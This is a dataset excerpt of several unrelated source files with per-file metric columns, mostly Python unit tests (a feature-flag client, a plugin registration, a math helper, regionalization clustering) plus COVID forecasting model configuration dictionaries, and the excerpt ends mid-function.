| 16.5 | 41 | 0.893939 | 9 | 66 | 6 | 0.555556 | 0.518519 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060606 | 66 | 3 | 42 | 22 | 0.870968 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
16887b95ec3ad967cf54868c034f60cdf09b3d0e | 167 | py | Python | tests/test_encode.py | oscekh/repobee-encode | 3e5dff25eec39578f9b3c240fec5c90861a12133 | ["MIT"] | null | null | null | tests/test_encode.py | oscekh/repobee-encode | 3e5dff25eec39578f9b3c240fec5c90861a12133 | ["MIT"] | null | null | null | tests/test_encode.py | oscekh/repobee-encode | 3e5dff25eec39578f9b3c240fec5c90861a12133 | ["MIT"] | null | null | null |
from _repobee import plugin
from repobee_encode import encode
def test_register():
"""Just test that there is no crash"""
plugin.register_plugins([encode])
| 18.555556 | 42 | 0.742515 | 23 | 167 | 5.217391 | 0.652174 | 0.183333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173653 | 167 | 8 | 43 | 20.875 | 0.869565 | 0.191617 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
16cf8986165be95d7c042053edc8404c0c0702db | 20,484 | py | Python | tests/test_client.py | rusintez/flipper-client | cd00ae1a3582c5cb7e661c5aa9b8a7b65b35a9e0 | ["Apache-2.0"] | null | null | null | tests/test_client.py | rusintez/flipper-client | cd00ae1a3582c5cb7e661c5aa9b8a7b65b35a9e0 | ["Apache-2.0"] | null | null | null | tests/test_client.py | rusintez/flipper-client | cd00ae1a3582c5cb7e661c5aa9b8a7b65b35a9e0 | ["Apache-2.0"] | null | null | null |
import unittest
from unittest.mock import MagicMock
from uuid import uuid4
from flipper import Condition, FeatureFlagClient, MemoryFeatureFlagStore
from flipper.bucketing import Percentage, PercentageBucketer
from flipper.contrib.storage import FeatureFlagStoreMeta
from flipper.events import EventType, FlipperEventEmitter
from flipper.exceptions import FlagDoesNotExistError
from flipper.flag import FeatureFlag
class BaseTest(unittest.TestCase):
def setUp(self):
self.store = MemoryFeatureFlagStore()
self.client = FeatureFlagClient(self.store)
def txt(self):
return uuid4().hex
class TestIsEnabled(BaseTest):
def test_returns_true_when_feature_enabled(self):
feature_name = self.txt()
self.client.create(feature_name)
self.client.enable(feature_name)
self.assertTrue(self.client.is_enabled(feature_name))
def test_returns_false_when_feature_disabled(self):
feature_name = self.txt()
self.client.create(feature_name)
self.client.disable(feature_name)
self.assertFalse(self.client.is_enabled(feature_name))
def test_returns_false_when_feature_does_not_exist(self):
feature_name = self.txt()
self.assertFalse(self.client.is_enabled(feature_name))
def test_returns_true_if_condition_specifies(self):
feature_name = self.txt()
self.client.create(feature_name, is_enabled=True)
self.client.add_condition(feature_name, Condition(foo=True))
self.assertTrue(self.client.is_enabled(feature_name, foo=True))
def test_returns_false_if_condition_specifies(self):
feature_name = self.txt()
self.client.create(feature_name, is_enabled=True)
self.client.add_condition(feature_name, Condition(foo=True))
self.assertFalse(self.client.is_enabled(feature_name, foo=False))
def test_returns_false_if_feature_disabled_despite_condition(self):
feature_name = self.txt()
self.client.create(feature_name, is_enabled=False)
self.client.add_condition(feature_name, Condition(foo=True))
self.assertFalse(self.client.is_enabled(feature_name, foo=True))
def test_returns_false_if_bucketer_check_returns_false(self):
feature_name = self.txt()
bucketer = MagicMock()
bucketer.check.return_value = False
self.client.create(feature_name, is_enabled=True)
self.client.set_bucketer(feature_name, bucketer)
self.assertFalse(self.client.is_enabled(feature_name))
def test_returns_true_if_bucketer_check_returns_true(self):
feature_name = self.txt()
bucketer = MagicMock()
bucketer.check.return_value = True
self.client.create(feature_name, is_enabled=True)
self.client.set_bucketer(feature_name, bucketer)
self.assertTrue(self.client.is_enabled(feature_name))
def test_forwards_conditions_to_bucketer(self):
feature_name = self.txt()
bucketer = MagicMock()
self.client.create(feature_name, is_enabled=True)
self.client.set_bucketer(feature_name, bucketer)
self.client.is_enabled(feature_name, foo=True)
bucketer.check.assert_called_with(foo=True)
class TestCreate(BaseTest):
def test_creates_and_returns_instance_of_feature_flag_class(self):
feature_name = self.txt()
flag = self.client.create(feature_name)
self.assertTrue(isinstance(flag, FeatureFlag))
def test_creates_flag_with_correct_name(self):
feature_name = self.txt()
flag = self.client.create(feature_name)
self.assertEqual(feature_name, flag.name)
def test_is_enabled_defaults_to_false(self):
feature_name = self.txt()
self.client.create(feature_name)
self.assertFalse(self.client.is_enabled(feature_name))
def test_flag_can_be_enabled_on_create(self):
feature_name = self.txt()
self.client.create(feature_name, is_enabled=True)
self.assertTrue(self.client.is_enabled(feature_name))
def test_emits_pre_create_event_with_correct_args(self):
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.PRE_CREATE, f=listener)
feature_name = self.txt()
client_data = {"x": 10}
self.client.events = events
self.client.create(feature_name, is_enabled=True, client_data=client_data)
listener.assert_called_with(
feature_name, is_enabled=True, client_data=client_data
)
def test_emits_post_create_event_with_correct_args(self):
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.POST_CREATE, f=listener)
feature_name = self.txt()
client_data = {"x": 10}
self.client.events = events
self.client.create(feature_name, is_enabled=True, client_data=client_data)
listener.assert_called_with(
feature_name, is_enabled=True, client_data=client_data
)
class TestGet(BaseTest):
def test_returns_instance_of_feature_flag_class(self):
feature_name = self.txt()
self.client.create(feature_name)
flag = self.client.get(feature_name)
self.assertTrue(isinstance(flag, FeatureFlag))
def test_returns_flag_with_correct_name(self):
feature_name = self.txt()
self.client.create(feature_name)
flag = self.client.get(feature_name)
self.assertEqual(feature_name, flag.name)
class TestDestroy(BaseTest):
def test_get_will_return_instance_of_flag(self):
feature_name = self.txt()
self.client.create(feature_name)
self.client.destroy(feature_name)
flag = self.client.get(feature_name)
self.assertTrue(isinstance(flag, FeatureFlag))
def test_status_switches_to_disabled(self):
feature_name = self.txt()
self.client.create(feature_name)
self.client.enable(feature_name)
self.client.destroy(feature_name)
self.assertFalse(self.client.is_enabled(feature_name))
def test_raises_for_nonexistent_flag(self):
feature_name = self.txt()
with self.assertRaises(FlagDoesNotExistError):
self.client.destroy(feature_name)
def test_emits_pre_destroy_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.PRE_DESTROY, f=listener)
self.client.events = events
self.client.create(feature_name)
self.client.destroy(feature_name)
listener.assert_called_once_with(feature_name)
def test_emits_post_destroy_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.POST_DESTROY, f=listener)
self.client.events = events
self.client.create(feature_name)
self.client.destroy(feature_name)
listener.assert_called_once_with(feature_name)
class TestEnable(BaseTest):
def test_is_enabled_will_be_true(self):
feature_name = self.txt()
self.client.create(feature_name)
self.client.enable(feature_name)
self.assertTrue(self.client.is_enabled(feature_name))
def test_is_enabled_will_be_true_if_disable_was_called_earlier(self):
feature_name = self.txt()
self.client.create(feature_name)
self.client.disable(feature_name)
self.client.enable(feature_name)
self.assertTrue(self.client.is_enabled(feature_name))
def test_raises_for_nonexistent_flag(self):
feature_name = self.txt()
with self.assertRaises(FlagDoesNotExistError):
self.client.enable(feature_name)
def test_emits_pre_enable_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.PRE_ENABLE, f=listener)
self.client.events = events
self.client.create(feature_name)
self.client.enable(feature_name)
listener.assert_called_once_with(feature_name)
def test_emits_post_enable_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.POST_ENABLE, f=listener)
self.client.events = events
self.client.create(feature_name)
self.client.enable(feature_name)
listener.assert_called_once_with(feature_name)
class TestDisable(BaseTest):
def test_is_enabled_will_be_false(self):
feature_name = self.txt()
self.client.create(feature_name)
self.client.disable(feature_name)
self.assertFalse(self.client.is_enabled(feature_name))
def test_is_enabled_will_be_false_if_enable_was_called_earlier(self):
feature_name = self.txt()
self.client.create(feature_name)
self.client.enable(feature_name)
self.client.disable(feature_name)
self.assertFalse(self.client.is_enabled(feature_name))
def test_raises_for_nonexistent_flag(self):
feature_name = self.txt()
with self.assertRaises(FlagDoesNotExistError):
self.client.disable(feature_name)
def test_emits_pre_disable_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.PRE_DISABLE, f=listener)
self.client.events = events
self.client.create(feature_name)
self.client.disable(feature_name)
listener.assert_called_once_with(feature_name)
def test_emits_post_disable_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.POST_DISABLE, f=listener)
self.client.events = events
self.client.create(feature_name)
self.client.disable(feature_name)
listener.assert_called_once_with(feature_name)
class TestExists(BaseTest):
def test_exists_is_false_when_feature_does_not_exist(self):
feature_name = self.txt()
self.assertFalse(self.client.exists(feature_name))
def test_exists_is_true_when_feature_does_exist(self):
feature_name = self.txt()
self.client.create(feature_name)
self.assertTrue(self.client.exists(feature_name))
class TestList(BaseTest):
def test_calls_backend_with_correct_args(self):
self.store.list = MagicMock()
limit, offset = 10, 25
list(self.client.list(limit=limit, offset=offset))
self.store.list.assert_called_once_with(limit=limit, offset=offset)
def test_returns_flag_objects(self):
feature_name = self.txt()
self.client.create(feature_name)
flag = next(self.client.list())
self.assertIsInstance(flag, FeatureFlag)
def test_returns_correct_flag_objects(self):
feature_name = self.txt()
expected = self.client.create(feature_name)
actual = next(self.client.list())
self.assertEqual(expected.name, actual.name)
def test_returns_correct_count_of_flag_objects(self):
feature_names = [self.txt() for _ in range(10)]
for feature_name in feature_names:
self.client.create(feature_name)
actual = list(self.client.list())
self.assertEqual(len(feature_names), len(actual))
class TestSetClientData(BaseTest):
def test_calls_backend_with_correct_feature_name(self):
self.store.set_meta = MagicMock()
feature_name = self.txt()
client_data = {self.txt(): self.txt()}
self.client.create(feature_name)
self.client.set_client_data(feature_name, client_data)
[actual, _] = self.store.set_meta.call_args[0]
self.assertEqual(feature_name, actual)
def test_calls_backend_with_instance_of_meta(self):
self.store.set_meta = MagicMock()
feature_name = self.txt()
client_data = {self.txt(): self.txt()}
self.client.create(feature_name)
self.client.set_client_data(feature_name, client_data)
[_, meta] = self.store.set_meta.call_args[0]
self.assertIsInstance(meta, FeatureFlagStoreMeta)
def test_calls_backend_with_correct_meta_client_data(self):
self.store.set_meta = MagicMock()
feature_name = self.txt()
client_data = {self.txt(): self.txt()}
self.client.create(feature_name)
self.client.set_client_data(feature_name, client_data)
[_, meta] = self.store.set_meta.call_args[0]
self.assertEqual(client_data, meta.client_data)
def test_calls_backend_with_non_null_meta_created_date(self):
self.store.set_meta = MagicMock()
feature_name = self.txt()
client_data = {self.txt(): self.txt()}
self.client.create(feature_name)
self.client.set_client_data(feature_name, client_data)
[_, meta] = self.store.set_meta.call_args[0]
self.assertIsNotNone(meta.created_date)
def test_calls_backend_exactly_once(self):
self.store.set_meta = MagicMock()
feature_name = self.txt()
client_data = {self.txt(): self.txt()}
self.client.create(feature_name)
self.client.set_client_data(feature_name, client_data)
self.assertEqual(1, self.store.set_meta.call_count)
def test_merges_new_values_with_existing(self):
feature_name = self.txt()
existing_data = {"existing_key": self.txt()}
self.store.create(feature_name, client_data=existing_data)
new_data = {"new_key": self.txt()}
self.client.set_client_data(feature_name, new_data)
item = self.store.get(feature_name)
self.assertEqual({**existing_data, **new_data}, item.meta["client_data"])
def test_can_override_existing_values(self):
feature_name = self.txt()
existing_data = {"existing_key": self.txt()}
self.store.create(feature_name, client_data=existing_data)
new_data = {"existing_key": self.txt(), "new_key": self.txt()}
self.client.set_client_data(feature_name, new_data)
item = self.store.get(feature_name)
self.assertEqual(new_data, item.meta["client_data"])
def test_raises_for_nonexistent_flag(self):
feature_name = self.txt()
client_data = {self.txt(): self.txt()}
with self.assertRaises(FlagDoesNotExistError):
self.client.set_client_data(feature_name, client_data)
def test_emits_pre_set_client_data_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.PRE_SET_CLIENT_DATA, f=listener)
existing_data = {"existing_key": self.txt()}
self.client.events = events
self.client.create(feature_name, client_data=existing_data)
new_data = {"existing_key": self.txt(), "new_key": self.txt()}
self.client.set_client_data(feature_name, new_data)
listener.assert_called_once_with(feature_name, new_data)
def test_emits_post_set_client_data_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.POST_SET_CLIENT_DATA, f=listener)
existing_data = {"existing_key": self.txt()}
self.client.events = events
self.client.create(feature_name, client_data=existing_data)
new_data = {"existing_key": self.txt(), "new_key": self.txt()}
self.client.set_client_data(feature_name, new_data)
listener.assert_called_once_with(feature_name, new_data)
class TestGetClientData(BaseTest):
def test_gets_expected_key_value_pairs(self):
feature_name = self.txt()
client_data = {self.txt(): self.txt()}
self.client.create(feature_name, client_data=client_data)
result = self.client.get_client_data(feature_name)
self.assertEqual(client_data, result)
def test_raises_for_nonexistent_flag(self):
feature_name = self.txt()
with self.assertRaises(FlagDoesNotExistError):
self.client.get_client_data(feature_name)
class TestGetMeta(BaseTest):
def test_includes_created_date(self):
feature_name = self.txt()
client_data = {self.txt(): self.txt()}
self.client.create(feature_name, client_data=client_data)
meta = self.client.get_meta(feature_name)
self.assertTrue("created_date" in meta)
def test_includes_client_data(self):
feature_name = self.txt()
client_data = {self.txt(): self.txt()}
self.client.create(feature_name, client_data=client_data)
meta = self.client.get_meta(feature_name)
self.assertEqual(client_data, meta["client_data"])
def test_raises_for_nonexistent_flag(self):
feature_name = self.txt()
with self.assertRaises(FlagDoesNotExistError):
self.client.get_meta(feature_name)
class TestAddCondition(BaseTest):
def test_condition_gets_included_in_meta(self):
feature_name = self.txt()
condition_checks = {self.txt(): True}
condition = Condition(**condition_checks)
self.client.create(feature_name)
self.client.add_condition(feature_name, condition)
meta = self.client.get_meta(feature_name)
self.assertTrue(condition.to_dict() in meta["conditions"])
def test_condition_gets_appended_to_meta(self):
feature_name = self.txt()
condition_checks = {self.txt(): True}
condition = Condition(**condition_checks)
self.client.create(feature_name)
self.client.add_condition(feature_name, condition)
self.client.add_condition(feature_name, condition)
meta = self.client.get_meta(feature_name)
self.assertEqual(2, len(meta["conditions"]))
def test_emits_pre_add_condition_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.PRE_ADD_CONDITION, f=listener)
condition_checks = {self.txt(): True}
condition = Condition(**condition_checks)
self.client.events = events
self.store.create(feature_name)
self.client.add_condition(feature_name, condition)
listener.assert_called_once_with(feature_name, condition)
def test_emits_post_add_condition_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.POST_ADD_CONDITION, f=listener)
condition_checks = {self.txt(): True}
condition = Condition(**condition_checks)
self.client.events = events
self.store.create(feature_name)
self.client.add_condition(feature_name, condition)
listener.assert_called_once_with(feature_name, condition)
class TestSetBucketer(BaseTest):
def test_bucketer_gets_included_in_meta(self):
feature_name = self.txt()
percentage_value = 0.1
bucketer = PercentageBucketer(percentage=Percentage(percentage_value))
self.client.create(feature_name)
self.client.set_bucketer(feature_name, bucketer)
meta = self.client.get_meta(feature_name)
self.assertEqual(bucketer.to_dict(), meta["bucketer"])
def test_emits_pre_set_bucketer_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.PRE_SET_BUCKETER, f=listener)
percentage_value = 0.1
bucketer = PercentageBucketer(percentage=Percentage(percentage_value))
self.client.events = events
self.store.create(feature_name)
self.client.set_bucketer(feature_name, bucketer)
listener.assert_called_once_with(feature_name, bucketer)
def test_emits_post_set_bucketer_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.POST_SET_BUCKETER, f=listener)
percentage_value = 0.1
bucketer = PercentageBucketer(percentage=Percentage(percentage_value))
self.client.events = events
self.store.create(feature_name)
self.client.set_bucketer(feature_name, bucketer)
listener.assert_called_once_with(feature_name, bucketer)
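# Editor's note: a compact usage sketch of the client API this suite
# exercises, assuming flipper's in-memory store (the concrete store built in
# setUp is not shown in this excerpt):
#
#     client = FeatureFlagClient(MemoryFeatureFlagStore())
#     client.create("new_checkout", is_enabled=True)
#     client.add_condition("new_checkout", Condition(is_employee=True))
#     client.set_bucketer("new_checkout",
#                         PercentageBucketer(percentage=Percentage(0.1)))
#     client.is_enabled("new_checkout", is_employee=True)  # flag + condition + bucketer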
| 29.816594
| 82
| 0.693273
| 2,501
| 20,484
| 5.367453
| 0.062775
| 0.166344
| 0.122914
| 0.077771
| 0.84848
| 0.822557
| 0.804306
| 0.781287
| 0.76758
| 0.740092
| 0
| 0.001485
| 0.21075
| 20,484
| 686
| 83
| 29.860058
| 0.828849
| 0
| 0
| 0.676744
| 0
| 0
| 0.009129
| 0
| 0
| 0
| 0
| 0
| 0.139535
| 1
| 0.144186
| false
| 0
| 0.02093
| 0.002326
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6
| bc7c921e77ed478e60c5eb44483ee5f6ac512095
| 100
| py
| Python
| couch_lifestream/context_processors.py
| ericflo/django-couch-lifestream
| 53aac40f6e617b78d07a8c4f121d422e07674e46
| ["BSD-3-Clause"]
| 3
| 2015-11-05T03:15:21.000Z
| 2022-03-23T10:31:17.000Z
| couch_lifestream/context_processors.py
| ericflo/django-couch-lifestream
| 53aac40f6e617b78d07a8c4f121d422e07674e46
| ["BSD-3-Clause"]
| null | null | null
| couch_lifestream/context_processors.py
| ericflo/django-couch-lifestream
| 53aac40f6e617b78d07a8c4f121d422e07674e46
| ["BSD-3-Clause"]
| null | null | null |
from couch_lifestream import USERNAMES
def usernames(request):
return dict(USERNAMES=USERNAMES)
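# Editor's note: a context processor only runs once it is registered in the
# project's template settings. A minimal sketch for a modern Django settings
# module (wiring assumed; the settings file is not part of this excerpt):
#
#     TEMPLATES = [{
#         "BACKEND": "django.template.backends.django.DjangoTemplates",
#         "OPTIONS": {
#             "context_processors": [
#                 "couch_lifestream.context_processors.usernames",
#             ],
#         },
#     }]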
| 25
| 38
| 0.82
| 12
| 100
| 6.75
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 100
| 4
| 39
| 25
| 0.920455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 6
| bcc02ecf51191c2d9e1579977cf8ad34c4af1da5
| 135
| py
| Python
| tests/test_math.py
| iyanmv/galois
| a5e6386a684e3e0b47af608217002795dc25c702
| ["MIT"]
| 65
| 2021-02-20T04:07:59.000Z
| 2022-03-13T10:14:58.000Z
| tests/test_math.py
| iyanmv/galois
| a5e6386a684e3e0b47af608217002795dc25c702
| ["MIT"]
| 303
| 2021-02-22T19:36:25.000Z
| 2022-03-31T14:48:15.000Z
| tests/test_math.py
| iyanmv/galois
| a5e6386a684e3e0b47af608217002795dc25c702
| ["MIT"]
| 9
| 2021-03-11T07:40:51.000Z
| 2022-03-06T20:13:17.000Z |
"""
A pytest module to test the functions in _math.py.
"""
import galois
def test_prod():
assert galois.prod(2, 4, 14) == 2*4*14
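# Editor's note: a reference the assertion above can be cross-checked against:
# a plain left-fold product (a sketch, independent of galois's implementation).
from functools import reduce

def _prod_sketch(*values):
    # Multiply the arguments left to right; _prod_sketch(2, 4, 14) == 112.
    return reduce(lambda acc, v: acc * v, values, 1)

assert _prod_sketch(2, 4, 14) == 2 * 4 * 14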
| 15
| 50
| 0.651852
| 24
| 135
| 3.583333
| 0.75
| 0.046512
| 0.093023
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 0.2
| 135
| 8
| 51
| 16.875
| 0.722222
| 0.37037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 6
| bceb31511a2773f7060d8c45b37fcf821150b21a
| 3,718
| py
| Python
| scripts/configs.py
| dsheldon/covid
| 5ca06c88afd91ed910c66051821d1e119547222f
| ["MIT"]
| 30
| 2020-05-12T19:25:50.000Z
| 2021-03-07T01:51:57.000Z
| scripts/configs.py
| dsheldon/covid
| 5ca06c88afd91ed910c66051821d1e119547222f
| ["MIT"]
| 6
| 2020-04-29T18:04:11.000Z
| 2021-02-15T17:33:16.000Z
| scripts/configs.py
| dsheldon/covid
| 5ca06c88afd91ed910c66051821d1e119547222f
| ["MIT"]
| 13
| 2020-05-06T11:48:38.000Z
| 2022-02-22T01:02:51.000Z |
import covid.models.SEIRD
import covid.models.SEIRD_variable_detection
import covid.models.SEIRD_incident
import covid.util as util
# 2020-04-25 forecast (?)
SEIRD = {
'model' : covid.models.SEIRD.SEIRD,
'args' : {} # use defaults
}
# 2020-05-03 forecast
strongest_prior = {
'model' : covid.models.SEIRD_variable_detection.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100
}
}
# 2020-05-10 forecast
fit_dispersion = {
'model' : covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100
}
}
# State forecasts starting 2020-05-17, all US forecasts
resample_80_last_10 = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100,
'resample_high': 80,
'rw_use_last': 10
}
}
# State and US forecasts starting 2020-09-06
longer_H = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100,
'resample_high': 80,
'rw_use_last': 10,
'H_duration_est': 18.0
}
}
# State and US forecasts starting 2020-09-20, except 2020-10-20
# changed gamma_shape and sigma_shape from 100 to 1000 on 2021-01-10
llonger_H = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 1000,
'sigma_shape': 1000,
'resample_high': 80,
'rw_use_last': 10,
'H_duration_est': 25.0
}
}
# Less rw
llonger_H_fix = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 1000,
'sigma_shape': 1000,
'resample_high': 80,
'rw_use_last': 10,
'rw_scale': 1e-1,
'H_duration_est': 25.0
}
}
# For debugging on May 10
# start with llonger_H_fix
# increase priors on sigma, beta, death_prob, death_rate by factor of 10
debug = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 1000,
'sigma_shape': 10000,
'beta_shape': 10,
'death_rate_shape': 100,
'death_prob_conc': 1000,
'resample_high': 80,
'rw_use_last': 10,
'rw_scale': 1e-1,
'H_duration_est': 25.0,
'num_warmup': 100,
'num_samples': 100
}
}
# For debugging on May 10
# start with llonger_H_fix
# increase priors on sigma, beta, death_prob, death_rate by factor of 10
fix = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 1000,
'sigma_shape': 10000,
'beta_shape': 10,
'death_rate_shape': 100,
'death_prob_conc': 1000,
'resample_high': 80,
'rw_use_last': 10,
'rw_scale': 1e-1,
'H_duration_est': 25.0
}
}
# State and US forecasts 2020-10-20
lllonger_H = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100,
'resample_high': 80,
'rw_use_last': 10,
'H_duration_est': 35.0
}
}
# changed gamma_shape and sigma_shape from 100 to 1000 on 2021-01-10
counties = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 1000,
'sigma_shape': 1000,
'resample_high': 80,
'rw_use_last': 10,
'rw_scale': 1e-1,
'T_future': 8*7
}
}
counties_fix = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100,
'resample_high': 80,
'rw_use_last': 10,
'rw_scale': 1e-1,
'T_future': 8*7,
'H_duration_est': 25.0,
'beta_shape': 1
}
}
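# Editor's note: every entry above pairs a model class with a kwargs dict. A
# sketch of how a runner script might select and unpack one of these configs
# by name (hypothetical helper; the actual run scripts are not in this file):
def _select_config_sketch(name):
    # Resolve the module-level config dict, e.g. _select_config_sketch('longer_H').
    config = globals()[name]
    return config['model'], dict(config['args'])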
| 22.950617
| 74
| 0.574233
| 476
| 3,718
| 4.231092
| 0.189076
| 0.081927
| 0.119166
| 0.125124
| 0.807845
| 0.756207
| 0.756207
| 0.723436
| 0.706058
| 0.706058
| 0
| 0.106667
| 0.293975
| 3,718
| 161
| 75
| 23.093168
| 0.660571
| 0.178053
| 0
| 0.603175
| 0
| 0
| 0.274194
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.031746
| 0
| 0.031746
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6
| 4c308168026b5ae21ac655a9947a0ecf8ea9b55b
| 40
| py
| Python
| Lib/inspect.py
| jdahlin/cpython
| a51a0e7517c39d0e2268124708e6dfdd3295925d
| ["CNRI-Python-GPL-Compatible"]
| null | null | null
| Lib/inspect.py
| jdahlin/cpython
| a51a0e7517c39d0e2268124708e6dfdd3295925d
| ["CNRI-Python-GPL-Compatible"]
| null | null | null
| Lib/inspect.py
| jdahlin/cpython
| a51a0e7517c39d0e2268124708e6dfdd3295925d
| ["CNRI-Python-GPL-Compatible"]
| null | null | null |
def getmro(cls):
return cls.__mro__
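# Editor's note: __mro__ is the class's C3-linearized method resolution order;
# a quick illustration:
assert getmro(bool) == (bool, int, object)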
| 13.333333
| 22
| 0.7
| 6
| 40
| 4
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 40
| 2
| 23
| 20
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 6
| 4c58d85130fbc4a5cc48c02ac91af37adfd3f3b2
| 4,410
| py
| Python
| region/p_regions/tests/test_azp_basic_tabu.py
| Dexterzhao/region
| 596476ad291bfbbeb7d88bb70503aff89c1df59c
| ["BSD-3-Clause"]
| null | null | null
| region/p_regions/tests/test_azp_basic_tabu.py
| Dexterzhao/region
| 596476ad291bfbbeb7d88bb70503aff89c1df59c
| ["BSD-3-Clause"]
| null | null | null
| region/p_regions/tests/test_azp_basic_tabu.py
| Dexterzhao/region
| 596476ad291bfbbeb7d88bb70503aff89c1df59c
| ["BSD-3-Clause"]
| 1
| 2018-10-16T23:59:23.000Z
| 2018-10-16T23:59:23.000Z |
import networkx as nx
from region.p_regions.azp import AZPBasicTabu
from region.tests.util import region_list_from_array, compare_region_lists
from region.util import dataframe_to_dict
from region.p_regions.tests.data import adj, neighbors_dict, gdf, graph, w, \
attr, attr_dict, attr_str, double_attr_str, \
double_attr, double_attr_dict, \
optimal_clustering
# ### TESTS WITH SCALAR attr ##################################################
# test with csr_matrix
def test_scipy_sparse_matrix():
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_scipy_sparse_matrix(adj, attr, n_regions=2)
obtained = region_list_from_array(cluster_object.labels_)
compare_region_lists(obtained, optimal_clustering)
# tests with a GeoDataFrame as areas argument
def test_geodataframe():
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_geodataframe(gdf, attr_str, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# tests with a dict as areas argument
def test_dict():
value_dict = dataframe_to_dict(gdf, attr_str)
